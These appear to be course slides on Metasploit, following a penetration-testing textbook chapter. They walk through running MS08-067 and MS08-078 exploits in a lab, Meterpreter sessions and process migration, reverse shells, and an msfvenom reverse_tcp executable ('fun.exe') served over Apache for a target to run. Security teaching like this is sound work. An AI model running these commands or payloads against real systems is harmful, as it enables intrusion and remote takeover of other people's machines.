Ch 4: Metasploit
Following Chapter 4 of Georgia Weidman's
Penetration Testing book.
Why Use Metasploit?
- Ease of use
- Trusted base of exploit code--not all
attack code is safe to use
First command starts PostgreSQL, a database.
You don't need it for basic Metasploit
functions, but with the database
you can save scans.
The second command differs from the textbook,
Kali 2 has a different version
of Metasploit than was in Kali 1.
Third command starts one of the interfaces
for using Metasploit.
service postgresql start
Finding Metasploit Modules
MS08-067 is a famous Windows vuln, very
powerful. Patched in 2008, but many systems
You can search for modules by
Search for MS08-067 -- notice that
MS08-67 does not work.
- CVE number
- OSVDB ID
- Bugtraq ID
- Microsoft Security Bulletin ID
- Any string in the text
Note the Module Name in the
lower left of the image below.
Note these items:
- Descriptive Name
- Module name
- Platform identifies the target systems
- Privileged tells us whether the module
requires or grants high privileges on the target
- Rank potential impact on the target, from "manual" to "excellent" (never crashes a service).
"Great" automatically detects the correct target
and is likely to succeed.
Note these items:
- Basic options available options
to customize the attack. Options that are
required, but have no default value, such as
RHOST in the image below, must be set by
the user before running the exploit.
- Payload information helps Metasploit decide which payloads it can use with this exploit.
Details about these fields are at
Using an Exploit
Setting Module Options
Attack Server 2008 Machine
Default values are OK for the other
set RHOST 192.168.119.129
Payloads (or Shellcode)
We need to tell Metasploit what
we want to do to the target.
Shows only payloads compatible with the
Using Default Payload
If you don't choose one, Metasploit
will sometimes choose a good default.
For Linux targets, it's usually
This attack won't work on Windows Server
However, searching the Metasploit online
for "Windows 2008" finds this one:
MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption
On Windows 2008 target system, open IE and
open the page shown by Metasploit,
as highlighted below:
sessions shows open sessions
sessions -i 1 starts interaction with session 1
help shows Meterpreter commands
sessions -i 1
Migrating to Another Process
List processes with ps and find
a good process to migrate to, so you'll retain
control even if the user closes the browser.
"explorer" is a good process to use. You'll need
its Process ID, which was 2176 when I did it.
but will be different on your system.
ps | grep exp
Exiting from Meterpreter
Types of Shells
Starts a process listening on the target,
on a specified port such as 4444.
Will fail if the server is behind a
firewall that blocks unused ports,
which is usually the case.
Target makes an outgoing connection to
the attacker. Much more likely to succeed
than a bind shell, especially if the
attacker's port is a common one like
80 or 443.
Setting a Payload Manually
This exploit has two network configurations:
one for the module (the Web server delivering
the exploit), and one for the reverse shell payload.
All of them have reasonable default values.
set payload windows/shell_reverse_tcp
In my case, port 4444 was busy and I had to move
to another port.
sessions -i 2
Msfcli is Gone
Msfcli was deprecated, replaced by
"msfconsole -q -x".
Its purpose is to run an exploit from a single
line of code, so it's easier to test
and script exploits.
A more detailed example is here:
msfconsole -q -x "use exploit/windows/browser/ms08_078_xml_corruption; exploit"
sessions -i 1
Creating Standalone Payloads with Msfvenom
Msfvenom replaces the older msfpayload
and msfencode commands.
Choosing a Payload
msfvenom -l payloads
msfvenom -l payloads | grep windows | grep meterpreter | grep reverse
The --payload-options switch shows the options, not "-o" as in the textbook.
msfvenom -p windows/meterpreter/reverse_tcp --payload-options
Choosing an Output Format
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe > fun.exe
cp fun.exe /var/www/html
service apache2 start
Using the Multi/Handler Module
We need to run a server for the target
to connect to.
On target system, download
and run it.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.119.130
Scanner HTTP Auxiliary Modules
Auxiliary Module Reference